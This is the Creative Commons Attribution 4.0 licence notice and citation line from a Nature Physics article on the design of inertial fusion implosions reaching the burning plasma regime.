Open Access. This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons license, and indicate if changes were made. The images or other third party material in this article are included in the article's Creative Commons license, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons license and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/.

Cite this article: Kritcher, A.L., Young, C.V., Robey, H.F. et al. Design of inertial fusion implosions reaching the burning plasma regime. Nat. Phys. 18, 251–258 (2022). https://doi.org/10.1038/s41567-021-01485-9